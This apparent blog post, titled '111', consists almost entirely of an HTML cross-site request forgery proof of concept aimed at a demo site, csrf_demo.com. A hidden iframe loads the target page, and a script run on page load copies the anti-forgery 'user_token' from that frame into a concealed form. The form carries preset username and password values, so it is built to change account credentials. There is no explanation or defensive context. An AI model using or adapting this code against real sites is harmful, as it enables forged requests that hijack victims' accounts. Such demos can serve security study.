JZTXT

111

发布时间 2023-08-10 14:25:11作者: weiwei0123
<iframe src="http://www.csrf_demo.com/csrf_4.php?url=csrf_4.php" id="hack" border="0" style="display:none;">
</iframe>
<body onload="attack()">
  <form method="GET" id="transfer" name="transfer" action="http://www.csrf_demo.com/csrf_4.php?url=csrf_4.php">
 
   <input type="hidden" name="username" value="222">
    <input type="hidden" name="password" value="222">
   <input type="hidden" name="user_token" value="">
<input type="submit" name="submit" value="submit">
   </form>
 
</body> 
 
<script type="text/javascript">
function attack(){
   document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
 
  
  }
</script>